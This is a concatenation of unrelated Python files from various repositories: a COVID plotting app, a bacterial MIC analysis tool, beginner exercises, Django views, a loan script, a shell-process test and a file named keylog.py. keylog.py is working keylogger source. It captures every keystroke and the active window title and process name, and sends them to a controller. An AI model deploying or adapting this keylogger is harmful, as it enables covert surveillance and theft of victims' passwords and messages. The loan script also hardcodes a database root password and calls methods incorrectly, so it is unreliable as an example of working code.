hovertemplate='<b>%{text}</b><br>' + '<extra></extra>' ) ) # Add trace to the figure if Region in set(dfs_curve['Region']): dotx = [np.array(dfs_curve.loc[dfs_curve['Region'] == Region,'DayElapsed'])[0]] doty = [np.array(dfs_curve.loc[dfs_curve['Region'] == Region,'Confirmed'])[0]] for regionName in ['The World', 'China', 'Japan', 'Italy', 'South Korea', 'US']: dotgrayx = [np.array(dfs_curve.loc[dfs_curve['Region'] == regionName, 'DayElapsed'])[0]] dotgrayy = [np.array(dfs_curve.loc[dfs_curve['Region'] == regionName, 'Confirmed'])[0]] fig_curve.add_trace(go.Scatter(x=dfs_curve.loc[dfs_curve['Region'] == regionName]['DayElapsed'], y=dfs_curve.loc[dfs_curve['Region'] == regionName]['Confirmed'], mode='lines', line_shape='spline', name=regionName, opacity=0.3, line=dict(color='#636363', width=1.5), text=[ i for i in dfs_curve.loc[dfs_curve['Region'] == regionName]['Region']], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) fig_curve.add_trace(go.Scatter(x=dotgrayx, y=dotgrayy, mode='markers', marker=dict(size=6, color='#636363', line=dict(width=1, color='#636363')), opacity=0.5, text=[regionName], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) fig_curve.add_trace(go.Scatter(x=dfs_curve.loc[dfs_curve['Region'] == Region]['DayElapsed'], y=dfs_curve.loc[dfs_curve['Region'] == Region]['Confirmed'], mode='lines', line_shape='spline', name=Region, line=dict(color='#d7191c', width=3), text=[ i for i in dfs_curve.loc[dfs_curve['Region'] == Region]['Region']], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) fig_curve.add_trace(go.Scatter(x=dotx, y=doty, mode='markers', marker=dict(size=7, color='#d7191c', line=dict(width=1, color='#d7191c')), text=[Region], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) else: for regionName in ['The World','China', 'Japan', 'Italy', 'South Korea', 'US']: dotgrayx = [np.array(dfs_curve.loc[dfs_curve['Region'] == regionName, 'DayElapsed'])[0]] dotgrayy = [np.array(dfs_curve.loc[dfs_curve['Region'] == regionName, 'Confirmed'])[0]] fig_curve.add_trace(go.Scatter(x=dfs_curve.loc[dfs_curve['Region'] == regionName]['DayElapsed'], y=dfs_curve.loc[dfs_curve['Region'] == regionName]['Confirmed'], mode='lines', line_shape='spline', name=regionName, opacity=0.3, line=dict(color='#636363', width=1.5), text=[ i for i in dfs_curve.loc[dfs_curve['Region'] == regionName]['Region']], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) fig_curve.add_trace(go.Scatter(x=dotgrayx, y=dotgrayy, mode='markers', marker=dict(size=6, color='#636363', line=dict(width=1, color='#636363')), opacity=0.5, text=[regionName], hovertemplate='<b>%{text}</b><br>' + '<br>%{x} days after 100 cases<br>' + 'with %{y:,d} cases<br>' '<extra></extra>' ) ) # Customise layout fig_curve.update_xaxes(range=[0, elapseDay-19]) fig_curve.update_yaxes(range=[1.9, 6]) fig_curve.update_layout( xaxis_title="Number of day since 100th confirmed cases", yaxis_title="Confirmed cases (Logarithmic)", margin=go.layout.Margin( l=10, r=10, b=10, t=5, pad=0 ), annotations=[dict( x=.5, y=.4, xref="paper", yref="paper", text=Region if Region in set(dfs_curve['Region']) else "Not over 100 cases", opacity=0.5, font=dict(family='Arial, sans-serif', size=60, color="grey"), ) ], yaxis_type="log", yaxis=dict( showline=False, linecolor='#272e3e', zeroline=False, # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth = .1, ), xaxis=dict( showline=False, linecolor='#272e3e', # showgrid=False, gridcolor='rgba(203, 210, 211,.3)', gridwidth = .1, zeroline=False ), showlegend=False, # hovermode = 'x', plot_bgcolor='#f4f4f2', paper_bgcolor='#cbd2d3', font=dict(color='#292929', size=10) ) return fig_curve if __name__ == "__main__": app.run_server(debug=True)
dcf26e4fbc990deff46d1ca28274644d2c882a7c
24dccc981b29ae7837b3db6b7ba85cc2534ab5e9
/MIC Data Exploration Tools/MIC_Data_Exploration_Tools.py
0284bbcb2f45ba453a969739b5ece3b41f518cb2
[]
no_license
burtonbiomedical/vitek_data_project
6bfcf921a7b7c6c1a4620a1940350ac56a166145
4435b6a67084089fb29f1999c28b9274789e71b3
refs/heads/master
2021-05-16T14:50:35.609674
2018-02-25T00:31:02
2018-02-25T00:31:02
118,652,673
0
0
null
null
null
null
UTF-8
Python
false
false
17,393
py
#Import Dependencies import pymongo import sys import os import pandas as pd import re import pickle import matplotlib.pyplot as plt import numbers import numpy as np import seaborn as sns from datetime import datetime, date class ExtractData: def __init__(self, db_name, mongo_client): """Inintialise database connection args:- db_name: Name of the database to search (must be of expected format)] mongo_client: pymongo client object""" self.db = mongo_client[db_name] self.all_orgs = self.db.organism_index def get_mic_data(self, organism): """Returns a list of dictionary objects, containing MIC data for all isolates for specified bacterial species. Return list of args:- organism: The organism to search for. Regular expressions are accepted""" report_ids = self.get_reportIDs(organism) total_mic_data = list(map(self.extract_report_mic_data, report_ids)) intended_organism_data = self.remove_irrelevant_isolates(organism, total_mic_data) return intended_organism_data def get_reportIDs(self, organism): """Get report IDs for organism of interest Returns list of report IDs args:- organism: the bacterial organism of interest (accepts regular expressions)""" report_summaries = list(self.all_orgs.find({'organism_name': {'$regex':organism}})) report_ids = [] for x in report_summaries: report_ids += x['reports'] return report_ids def extract_report_mic_data(self, reportID): """Get MIC data for a single report Returns MIC data for all isolates in a report, as list of dictionaries. args:- reportID: the report ID for the report to search for""" report = list(self.db.reports.find({'_id':reportID}))[0] mic_data = report['organism_summary'] return mic_data def remove_irrelevant_isolates(self, intended_organism, total_mic_data): """Report MIC array may contain data for desired organism, but accompanied with data for irrelvant organisms i.e. a report with multiple isolates. This function removes all isolates that are not of interest Returns a single array of dictionaries containing only those with organism of interest. args:- intended_organism: the organism that we are collecting data for extracted_mic_data: the total MIC summaries for all isolates from all reports as an array of dictionaries""" intended_organism_data = [] for l in total_mic_data: for org in l: org_name = org['isolate_data']['organism_name'] if re.compile(intended_organism, re.IGNORECASE).search(org_name): intended_organism_data.append(org) return intended_organism_data def to_pickle(self, mic_data, path, filename): """Export data as serialised python object args:- mic_data: extracted mic data as list of python dictionaries filename: file to save data too, with file extension 'pickle'""" with open("{}{}".format(path, filename), 'wb') as file: pickle.dump(mic_data, file) class ProcessData(): """Class for creating pandas dataframe and data exploration. Class expects a single organism MIC data file, as serialised python dictionary.""" def __init__(self, organism_mic_data_path, start_date=None, end_date=None): """args:- organism_mic_data_filename: string - organism mic data pickle file path""" self.mic_data = pickle.load(open(organism_mic_data_path, 'rb')) self.mic_dataframe = self.build_dataframe(start_date, end_date) def build_dataframe(self, start_date, end_date): """Creates pandas dataframe using mic data from pickle file Returns dataframe object args:- Specify date range using start and end dates: start_date: string of format YYYY-MM-DD or datetime object end_date: string of format YYYY-MM-DD or datetime object""" def get_drug_mic_data(drugMIC): """Creates dictionary object of format drugname:result from mic data dictionary values""" drugName = drugMIC['drug'] #Antibiotic result can be of type MIC value, or an interpretation e.g. + or - if 'mic' in list(drugMIC.keys()): drugResult = drugMIC['mic'] else: drugResult = drugMIC['interpretation'] return {drugName: drugResult} def build_row_object(isolate): """Builds dictionary object representing a single row, that details a single isolate""" mic_data = isolate['isolate_data']['mic_data'] drug_mic_data = list(map(lambda x: get_drug_mic_data(x), mic_data)) row = {drug:result for drugResult in drug_mic_data for drug,result in drugResult.items()} row['isolate_date'] = isolate['isolate_date'] row['species'] = isolate['isolate_data']['organism_name'] return row df_rows = [] for isolate in self.mic_data: if start_date != None and end_date != None: start_date = datetime.strptime(str(start_date), '%Y-%m-%d').date() end_date = datetime.strptime(str(end_date), '%Y-%m-%d').date() isolate_date = datetime.date(isolate['isolate_date']) if (isolate_date >= start_date) and (isolate_date <= end_date): df_rows.append(build_row_object(isolate)) else: df_rows.append(build_row_object(isolate)) df = pd.DataFrame.from_dict(df_rows) df.sort_values('isolate_date', inplace=True) df.set_index('isolate_date', inplace=True, drop=True) return df def get_dataframe(self): """Return pandas dataframe object""" return self.mic_dataframe.copy(deep=True) def to_excel(self, path): """Save pandas dataframe object as excel file args:- path: string - path to save file too""" self.mic_dataframe.to_excel(path) def antibiotic_series(self, antibiotic, remove_outliers=False): """Generate a pandas series object for specified antibiotic. args:- antibiotic: string - antibiotic of interest remove_outliers: integer - standard deviations either side of the mean to remain included in series data. Default = False, will include all data.""" antibiotic_data = self.mic_dataframe[antibiotic].copy() antibiotic_data = pd.to_numeric(antibiotic_data, errors='coerce') antibiotic_data.dropna(inplace=True) if remove_outliers != False: antibiotic_data = antibiotic_data[np.abs(antibiotic_data-antibiotic_data.mean()) <=(remove_outliers*antibiotic_data.std())] return antibiotic_data def antibiotic_descriptives(self, antibiotic, remove_outliers=False, save_path="/"): """Return descriptive statistics for requested antibiotic args:- antibiotic: string - antibiotic of interest remove_outliers: integer - standard deviations either side of the mean to remain included in series data. Default = False, will include all data.""" antibiotic_data = self.antibiotic_series(antibiotic, remove_outliers=remove_outliers) stats = {'Oldest data point': str(antibiotic_data.index.values[0]), 'Newest data point': str(antibiotic_data.index.values[antibiotic_data.shape[0]-1]), 'Total data points': antibiotic_data.count(), 'Mean': antibiotic_data.mean(), 'Standard dev': antibiotic_data.std(), 'Min MIC': antibiotic_data.min(), 'Max MIC': antibiotic_data.max(), 'Median MIC': antibiotic_data.median(), 'Sample variance': antibiotic_data.var(), 'Skewness': antibiotic_data.skew(), 'Kurtosis': antibiotic_data.kurt()} with open(save_path, 'wb') as file: pickle.dump(stats, file) def antibiotic_distribution_curve(self, antibiotic, bins='auto', remove_outliers=False, save_path='/', fig_name="Distribution"): """Generate distribution curve for selected antibiotic. args:- antibiotic: string - antibiotic of interest bins: integer/string - see numpy.histogram documentation for bins remove_outliers: integer - standard deviations either side of the mean to remain included in series data. Default = False, will include all data.""" antibiotic_data = self.antibiotic_series(antibiotic, remove_outliers=remove_outliers).values hist, bins = np.histogram(antibiotic_data, bins=bins) fig,ax = plt.subplots(figsize=(10,5)) ax.plot(bins[:-1], hist) plt.title('Distribution of MIC values for {}'.format(antibiotic)) with open('{}/{}.png'.format(save_path, fig_name), 'wb') as file: plt.savefig(file) def antibiotic_timeseries(self, antibiotic, intervals='M', remove_outliers=False): """Generate timeseries with mean MIC value and standard deviations, using the time interval provided. args:- antibiotic: string - antibiotic of interest interval: integer/string - see pandas documentation remove_outliers: integer - standard deviations either side of the mean to remain included in series data. Default = False, will include all data.""" antibiotic_data = self.antibiotic_series(antibiotic, remove_outliers=remove_outliers) means = antibiotic_data.resample(intervals).mean().rename('Mean MIC') std = antibiotic_data.resample(intervals).std().rename('SD') return pd.concat([means,std], axis=1) def antibiotic_trend_analysis(self, antibiotic, intervals='M', include_sd=True, remove_outliers=False, save_path='/', fig_name="Trend_Analysis"): """Generate trend line plot for mean MIC value over time, with line of best fit generated using first degree polynomial regression. args:- antibiotic: string - antibiotic of interest interval: integer/string - see pandas documentation include_sd: boolean - include +/- 1 standard deviation either side of mean remove_outliers: integer - standard deviations either side of the mean to remain included in series data. Default = False, will include all data.""" fig,ax = plt.subplots(figsize=(10,5)) timeseries = self.antibiotic_timeseries(antibiotic, intervals, remove_outliers=remove_outliers) timeseries.dropna(inplace=True) coefficients, residuals, _, _, _ = np.polyfit(range(len(timeseries.index)),timeseries['Mean MIC'],1,full=True) mse = residuals[0]/(len(timeseries.index)) nrmse = np.sqrt(mse)/(timeseries['Mean MIC'].max() - timeseries['Mean MIC'].min()) regression_analysis = 'First degree polynomial regression -- Slope: {0:2.6}, Fitting error: {1:2.6}%'.format( np.round(coefficients[0], decimals=4), np.round(nrmse*100, decimals=6)) ax.plot(timeseries.index.values, timeseries['Mean MIC'], label="Mean MIC") ax.plot(timeseries.index.values, [coefficients[0]*x + coefficients[1] for x in range(len(timeseries))]) if include_sd: timeseries['SD +1'] = timeseries['Mean MIC'] + timeseries['SD'] timeseries['SD -1'] = timeseries['Mean MIC'] - timeseries['SD'] ax.plot(timeseries.index.values, timeseries['SD +1'], label="+1 SD") ax.plot(timeseries.index.values, timeseries['SD -1'], label="-1 SD") ax.legend(loc='upper right', shadow=True, fontsize='small') plt.suptitle('{} Mean Inhibitory Concentration vs Time'.format(antibiotic), fontsize=16) plt.title(regression_analysis, fontsize=12) plt.xlabel('Time') plt.ylabel('MIC') with open('{}/{}.png'.format(save_path, fig_name), 'wb') as file: plt.savefig(file) def correlation_matrix(self, antibiotics='all', null_threshold=0.5, save_path='/', fig_name='Corr_Matrix'): """Generate correlation matrix of all drug MIC values, and show as heatmap args:- antibiotics: list of strings - antibiotics to include in matrix null_threshold: float - the maximum percentage, taken as a percentage of dataset size, of null values a column can have without being excluded from correlation matrix""" if antibiotics == 'all': columns = self.mic_dataframe.columns.tolist() else: columns = antibiotics antibiotic_data = self.mic_dataframe[columns].copy() antibiotic_data = antibiotic_data.apply(lambda x: pd.to_numeric(x, errors='coerce'), axis=1) antibiotic_data = antibiotic_data.loc[:, (antibiotic_data.isnull().sum(axis=0)/ antibiotic_data.shape[0] < null_threshold)] corr_matrix = antibiotic_data.corr() plt.figure(figsize=(18,15)) sns.set(font_scale=1.5) cmap = sns.cubehelix_palette(8, start=.5, rot=-.75, as_cmap=True) sns.heatmap(corr_matrix, annot=False, cmap=cmap) plt.title('Correlation matrix of MIC values') with open('{}/{}.png'.format(save_path, fig_name), 'wb') as file: plt.savefig(file) def getopts(argv): """Collect command-line options in a dictionary args:- argv: list of command line arguments""" opts = {} while argv: if argv[0][0] == '-': opts[argv[0][1:]] = argv[1] argv = argv[1:] return opts def run_process_data(myargs, save_path, pickle_file, start_date, end_date): processing_data = ProcessData(pickle_file, start_date=start_date, end_date=end_date) if 'antibiotic' in myargs.keys(): drug = myargs['antibiotic'] processing_data.antibiotic_descriptives(antibiotic=drug, save_path="{}{}/descriptive_stats.pickle".format(save_path, drug)) processing_data.antibiotic_distribution_curve(antibiotic=drug,bins=15, save_path="{}{}/figures/".format(save_path,drug), fig_name='distribution') processing_data.antibiotic_distribution_curve(antibiotic=drug,bins=15, save_path="{}{}/figures/".format(save_path,drug), fig_name='woOutliers_descriptives', remove_outliers=3) processing_data.antibiotic_trend_analysis(antibiotic=drug, save_path="{}{}/figures/".format(save_path,drug),include_sd=False, fig_name='distribution_noSD') processing_data.antibiotic_trend_analysis(antibiotic=drug, save_path="{}{}/figures/".format(save_path, drug),remove_outliers=True, include_sd=False, fig_name='woOutliers_distribution_noSD') processing_data.antibiotic_trend_analysis(antibiotic=drug, save_path="{}{}/figures/".format(save_path, drug), remove_outliers=True, fig_name='woOutliers_distribution_plusSD') processing_data.correlation_matrix(save_path=save_path, fig_name='Correlation_Matrix') return def mkdir_p(path): try: os.makedirs(path, mode=0o777) except OSError as exc: if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise if __name__ == '__main__': myargs = getopts(sys.argv) if 'dbname' in myargs.keys(): dbname = myargs['dbname'] else: sys.stdout.write("Please specify database name e.g '-dbname database1'") sys.exit() if 'bug' in myargs.keys(): bug = myargs['bug'] else: sys.stdout.write("Please specify target organism") sys.exit() if 'start_date' in myargs.keys() and 'end_date' in myargs.keys(): start_date = myargs['start_date'] end_date = myargs['end_date'] else: start_date = None end_date = None user_id = myargs['userID'] drug = myargs['antibiotic'] if start_date != None and end_date != None: save_path = '/home/rossco/Documents/web_projects/microbiology_data_portal/user_data/{}/{}_{}_{}/'.format(user_id, bug, start_date, end_date) else: save_path = '/home/rossco/Documents/web_projects/microbiology_data_portal/user_data/{}/{}/'.format(user_id, bug) pickle_file = "{}{}.pickle".format(save_path, bug) if os.path.exists(save_path): if os.path.exists('{}{}/'.format(save_path, drug)): sys.exit() else: mkdir_p("{}{}/".format(save_path, drug)) mkdir_p("{}{}/figures/".format(save_path, drug)) run_process_data(myargs, save_path, pickle_file, start_date, end_date) else: mkdir_p(save_path) mkdir_p("{}{}/".format(save_path, drug)) mkdir_p("{}{}/figures/".format(save_path, drug)) client = pymongo.MongoClient() extract = ExtractData(db_name=dbname, mongo_client=client) bug_data = extract.get_mic_data(organism=bug) file_name = '{}.pickle'.format(bug) extract.to_pickle(mic_data=bug_data, path=save_path, filename=file_name) run_process_data(myargs, save_path, pickle_file, start_date,end_date) sys.exit()
974ee489d6a9c2f187bc44cac0470cd633d1623c
dd673cc90672dc272e866c225a17442a0ac18123
/Lesson02/easy.py
259b74ac74cc0550bb5f95f3b64cf3ef91d66e33
[]
no_license
sigma7i/PythonLessons
6069019b97701ff3bcb3df23de607ea0a7a696fe
fe216ea9c5ea8cd998ee6b5a2b661eb385411d95
refs/heads/master
2021-01-24T12:12:06.780923
2018-03-21T10:47:43
2018-03-21T10:47:43
123,123,564
0
0
null
null
null
null
UTF-8
Python
false
false
516
py
#задача 1 list_of_fruits = ["яблоко", "банан", "киви", "арбуз"] counter = 1 for fruit in list_of_fruits: print(f"{counter}.{fruit}") counter +=1 #задача 2 list1 = ['a', 'b', 'c', 'd', 'e'] list2 = ['a', 'z', 'x', 'y', 'e'] difference = set(list1) - set(list2) print(difference) # задача 3 integer_list = range(1,11) new_list = [] for i in integer_list: if i % 2 == 0: new_list.append(i / 4) else: new_list.append(i * 2) print(new_list)
7702bf4de1212f401127beb699b460c50a1bdb54
1f187ab1fea83acec04fed50aeb4e406670124cc
/django_events/events/views.py
fb8851436aa8716ec41cee1b84cb60f8ae118555
[ "MIT" ]
permissive
chrisBrookes93/django-events-management
b231e4f7ff275a0910640e8138c06256b525f1fe
93886448a7bb85c8758324977ff67bcacc80bbec
refs/heads/master
2022-11-14T03:04:13.807371
2020-07-07T23:11:18
2020-07-07T23:11:18
275,236,675
0
0
null
null
null
null
UTF-8
Python
false
false
3,308
py
import logging from django.shortcuts import render from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin from django.views.generic import View, TemplateView, UpdateView, CreateView from django.http import HttpResponseForbidden from .models import Event from .forms import EventForm logger = logging.getLogger(__name__) class EventCreate(LoginRequiredMixin, CreateView): """ View to create an event """ model = Event fields = ['title', 'date_time', 'description'] template_name = 'events/create_event.html' def form_valid(self, form): """ Patch in the organiser to resolve the foreign key :param form: form submitted """ form.instance.organiser = self.request.user return super(EventCreate, self).form_valid(form) class EventUpdate(LoginRequiredMixin, UserPassesTestMixin, UpdateView): """ View to edit an event """ template_name = 'events/edit_event.html' form_class = EventForm model = Event def test_func(self): """ Permissions check to make sure that the current user is the event organiser :return: True if the user is the organiser, else False :rtype: bool """ event = self.get_object() return self.request.user == event.organiser def handle_no_permission(self): """ Return a forbidden HTTP error if the current user fails the permissions check """ return HttpResponseForbidden() class EventView(LoginRequiredMixin, View): def get(self, request, pk, *args, **kwargs): """ Render the basic web page that displays a given event. The actual data is retrieved from the API via AJAX, so only the pk is passed into the template """ return render(request, 'events/view_event.html', {'pk': pk}) FILTER_FUNC_TABLE = { 'o': Event.objects.get_events_organised_by_user, 'a': Event.objects.get_events_attended_by_user, 'p': Event.objects.get_events_in_past } class EventList(LoginRequiredMixin, TemplateView): def get(self, request, *args, **kwargs): """ Renders a template to display the list of events """ # Check if the GET request has an event filter in it query_filter = request.GET.get('filter') # Use the specific QuerySet function based on the event filter filter_func = FILTER_FUNC_TABLE.get(query_filter, Event.objects.get_current_events) query_set = filter_func(request.user) page = request.GET.get('page', 1) paginator = Paginator(query_set, 10) try: event_list = paginator.page(page) except PageNotAnInteger: event_list = paginator.page(1) except EmptyPage: event_list = paginator.page(paginator.num_pages) return render(request, 'events/list_events.html', { 'events': event_list, 'query_filter': query_filter })
2d0a0c2e59cc654c8eaad2585ef80daaf1d740ff
805d464569360ea6732febf6eb1e3be19f2b5f29
/education_loan.py
e62d5cd5c3251b21778a60e715c22ab439dd4ae3
[]
no_license
Mathan08/bank_loan
334841a9a1a08f62eab1bc7fed5f1235ce96fd23
b0dd9399da4439e21d56054f143affa63571795f
refs/heads/main
2023-07-13T08:35:07.564352
2021-08-17T06:45:59
2021-08-17T06:45:59
397,138,076
0
0
null
null
null
null
UTF-8
Python
false
false
2,036
py
import mysql.connector mydb=mysql.connector.connect(host="localhost",user="root",password="Janakiraman123!@#",database="education_loan") mycursor=mydb.cursor() class accountdetails: def __init__(self, username,Account_number): self.username = username self.Account_number = Account_number def user_details_checking(username,Account_number,bank_name): mycursor.execute("select * from user_details where account_number like %s",(Account_number,)) data=mycursor.fetchall() if username==data[0][1] and Account_number==data[0][2] and bank_name==data[0][3]: return data[0][0] def college_details(self): global name name=input("ENTER YOUR NAME AS PER CERTIFICATE:") college_name=input('ENTER YOUR COLLEGE NAME:') degree=input("ENTER YOUR DEGREE :") CGPA=input("ENTER YOUR CGPA:") mycursor.execute("insert into college_details(name,college_name,degree,CGPA)values(%s,%s,%s,%s);",(name,college_name,degree,CGPA,)) mydb.commit() return 1 def loan_details(self): mycursor.execute("select * from college_details where name like %s",(name,)) data=mycursor.fetchall() cgpa=data[0][4] cgpa=int(cgpa) mycursor.execute("select * from loan_details;") mydata=mycursor.fetchall() for i in mydata: if cgpa>=int(i[5]): print(i) username=str(input("ENTER YOUR NAME :")) Account_number=str(input("ENTER YOUR ACCOUNT NUMBER :")) bank_name=input("ENTER YOUR BANK NAME :") IFSC_CODE=input("ENTER IFSC CODE :") password=input("ENTER YOUR PASSWORD :") checked_data=accountdetails(username,Account_number) data=checked_data.user_details_checking if data: checking=input('ENTER YES IF ALREADY APPLIED FOR LOAN ELSE NO :') checking=checking.lower() if checking =="yes": print("True") else: if college_details(username): if loan_details(name): print(True) else: print('ENTER VALID ACCOUNT NUMBER')
bad121f3a1eeed6c74fe0f00ecc8248920f59431
cc590780b4ca4edced303e0899c4d753340e22f6
/login/bulk_data.py
50558e71e694f78f9c6758c1a70263cbc2def1c6
[]
no_license
guojiankaipython/-
b66c3f7293c04e67b8a4aee2e568046c6afe8a64
73a0ea7a402c9c7f5a1d7c040ee1f750b5d40801
refs/heads/master
2021-05-23T17:07:26.820290
2020-04-06T08:05:51
2020-04-06T08:05:51
253,394,467
1
0
null
null
null
null
UTF-8
Python
false
false
482
py
# import os # # if __name__ == '__main__': # # os.environ.setdefault("DJANGO_SETTINGS_MODULE", "login.settings") # import django # django.setup() # # # from app01 import models # # c_list = [] # # for i in range(521): # # obj = models.Customer( # qq=f'{i+1}{i+2}{i+3}', # name='刘旭%s'%i, # course=['PythonFullStack',], # # ) # c_list.append(obj) # models.Customer.objects.bulk_create(c_list)
07decb370299fda3f2ff899234b18278db953261
575959a55ce2412ac1ecec7d0a75b55a43044d43
/opy/_regtest/src/core/process_test.py
b5dc459802d8d83829352f7df294d190a96880f1
[ "Apache-2.0" ]
permissive
afunsten/oil
aa74a94db79ebe43c44d040149ea3b1bfb872bb7
e52071e10a78157db1e4f0befc439a36ca1cbc01
refs/heads/master
2020-04-18T10:13:17.177302
2019-01-25T01:08:31
2019-01-25T01:08:31
167,460,658
1
0
Apache-2.0
2019-01-25T00:48:20
2019-01-25T00:48:20
null
UTF-8
Python
false
false
3,552
py
#!/usr/bin/env python """ process_test.py: Tests for process.py """ import os import unittest from osh.meta import Id from core import builtin from osh.meta import ast from core import process # module under test from osh.meta import runtime from core import util from core.cmd_exec_test import InitExecutor # helper Process = process.Process ExternalThunk = process.ExternalThunk log = util.log def Banner(msg): print('-' * 60) print(msg) _WAITER = process.Waiter() def _ExtProc(argv): return Process(ExternalThunk(argv, {})) class ProcessTest(unittest.TestCase): def testStdinRedirect(self): waiter = process.Waiter() fd_state = process.FdState() PATH = '_tmp/one-two.txt' # Write two lines with open(PATH, 'w') as f: f.write('one\ntwo\n') # Should get the first line twice, because Pop() closes it! r = runtime.PathRedirect(Id.Redir_Less, 0, PATH) fd_state.Push([r], waiter) line1 = builtin.ReadLineFromStdin() fd_state.Pop() fd_state.Push([r], waiter) line2 = builtin.ReadLineFromStdin() fd_state.Pop() # sys.stdin.readline() would erroneously return 'two' because of buffering. self.assertEqual('one\n', line1) self.assertEqual('one\n', line2) def testProcess(self): # 3 fds. Does Python open it? Shell seems to have it too. Maybe it # inherits from the shell. print('FDS BEFORE', os.listdir('/dev/fd')) Banner('date') p = _ExtProc(['date']) status = p.Run(_WAITER) log('date returned %d', status) self.assertEqual(0, status) Banner('does-not-exist') p = _ExtProc(['does-not-exist']) print(p.Run(_WAITER)) # 12 file descriptors open! print('FDS AFTER', os.listdir('/dev/fd')) def testPipeline(self): print('BEFORE', os.listdir('/dev/fd')) p = process.Pipeline() p.Add(_ExtProc(['ls'])) p.Add(_ExtProc(['cut', '-d', '.', '-f', '2'])) p.Add(_ExtProc(['sort'])) p.Add(_ExtProc(['uniq', '-c'])) pipe_status = p.Run(_WAITER) log('pipe_status: %s', pipe_status) print('AFTER', os.listdir('/dev/fd')) def testPipeline2(self): Banner('ls | cut -d . -f 1 | head') p = process.Pipeline() p.Add(_ExtProc(['ls'])) p.Add(_ExtProc(['cut', '-d', '.', '-f', '1'])) p.Add(_ExtProc(['head'])) print(p.Run(_WAITER)) ex = InitExecutor() # Simulating subshell for each command w1 = ast.CompoundWord() w1.parts.append(ast.LiteralPart(ast.token(Id.Lit_Chars, 'ls'))) node1 = ast.SimpleCommand() node1.words = [w1] w2 = ast.CompoundWord() w2.parts.append(ast.LiteralPart(ast.token(Id.Lit_Chars, 'head'))) node2 = ast.SimpleCommand() node2.words = [w2] w3 = ast.CompoundWord() w3.parts.append(ast.LiteralPart(ast.token(Id.Lit_Chars, 'sort'))) w4 = ast.CompoundWord() w4.parts.append(ast.LiteralPart(ast.token(Id.Lit_Chars, '--reverse'))) node3 = ast.SimpleCommand() node3.words = [w3, w4] p = process.Pipeline() p.Add(Process(process.SubProgramThunk(ex, node1))) p.Add(Process(process.SubProgramThunk(ex, node2))) p.Add(Process(process.SubProgramThunk(ex, node3))) print(p.Run(_WAITER)) # TODO: Combine pipelines for other things: # echo foo 1>&2 | tee stdout.txt # # foo=$(ls | head) # # foo=$(<<EOF ls | head) # stdin # EOF # # ls | head & # Or technically we could fork the whole interpreter for foo|bar|baz and # capture stdout of that interpreter. if __name__ == '__main__': unittest.main()
62d283bb94abee18862867a046831544f6f502da
a8b89eadc948be2d4478702624752157c0657f0c
/keylog.py
5a19e62ae25a23c2e74596b3249d33696126a8e0
[]
no_license
ghdic/keylogger
0820e117491db26d7d6c51bf4fe1706792d405fd
45b3213a04710a0e2448662529319303f2e5d514
refs/heads/master
2023-03-09T05:44:59.986377
2021-03-01T09:58:47
2021-03-01T09:58:47
330,139,072
0
0
null
null
null
null
UTF-8
Python
false
false
1,700
py
import time from pynput.keyboard import Listener import ctypes import psutil import pickle class Keylogger: def __init__(self, controller): self.controller = controller def on_press(self, key): data = pickle.dumps({'info': 1, 'key': key}) self.controller.send(data) def get_title(self): """ 현재 활성화된 윈도우의 정보를 가져옴""" user32 = ctypes.windll.LoadLibrary('user32.dll') handle = user32.GetForegroundWindow() # 현재 활성화 윈도우 핸들 buffer = ctypes.create_unicode_buffer(255) # 저장버퍼 할당 user32.GetWindowTextW(handle, buffer, ctypes.sizeof(buffer)) # 버퍼에 타이들 저장 pid = ctypes.c_ulong() user32.GetWindowThreadProcessId(handle, ctypes.byref(pid)) # pid를 얻음 pid = pid.value if pid == 0: return p = psutil.Process(pid) data = pickle.dumps({'info': 2, 'pid': pid, 'pname': p.name(), 'title': buffer.value}) self.controller.send(data) def win_title(self): """ 타이틀 변경 관리 """ pid, pname, title = 0, "", "" while True: time.sleep(0.1) new_pid, new_pname, new_title = self.get_title() if pid != new_pid: # 프로세스가 바뀐경우 print("pid change %s", new_pname) else: if title != new_title: # 타이틀이 바뀐경우 print("title change %d [%s]" % (new_pid, new_title)) pid, pname, title = new_pid, new_pname, new_title def listen(self): with Listener(on_press=self.on_press) as listener: listener.join()
9fc475508ae898d890fc912806d1b63456174705
3825940585ae0af37c5d1c621db65e027058b3ec
/python/python_fundamentals/Functions Intermediate I.py
bad95566007c5c36f4061bfc2a552db189fc1a5f
[]
no_license
HalaAlmulhim/Python-
4a5fc2a98df3fe46441c5f71d824f9c159a8cac3
ffffddbcbb21755bc0ccb54b653ccbc0e3bf4ed1
refs/heads/main
2023-06-22T19:07:11.512270
2021-07-12T13:53:37
2021-07-12T13:53:37
385,262,302
0
0
null
null
null
null
UTF-8
Python
false
false
429
py
import random def randInt(min= 0, max= 100): num = random.random() * (max-min) + min return round(num) print(random.random()) ## should print a random integer between 0 to 50 print(random.random() * 50) # should print a random integer between 0 to 50 print(randInt(min=50)) # should print a random integer between 50 to 100 print(randInt(min=50, max=500)) # should print a random integer between 50 and 500
bda8a2cc40c609fd85cabbaae0e183194330c3e7
64794b57c199e0cb9bd7d15c1791d8698652aa81
/venv/bin/naked
6ccc40dc2a4708d8f2e6bef125031fda49d08377
[]
no_license
rid3thespiral/pyethwallet
7897905a5330936e50f14b4d1056b99ee7fb4877
81764b58758f9b7933165bf85036a83b8e226d9a
refs/heads/master
2021-04-11T10:52:40.813837
2020-03-21T16:13:10
2020-03-21T16:13:10
249,013,150
0
0
null
null
null
null
UTF-8
Python
false
false
252
#!/Users/davide/PycharmProjects/pyethwallet/venv/bin/python # -*- coding: utf-8 -*- import re import sys from Naked.app import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
a0d65f2aa3c2bd0f3e9352e624e89f8a134efd89
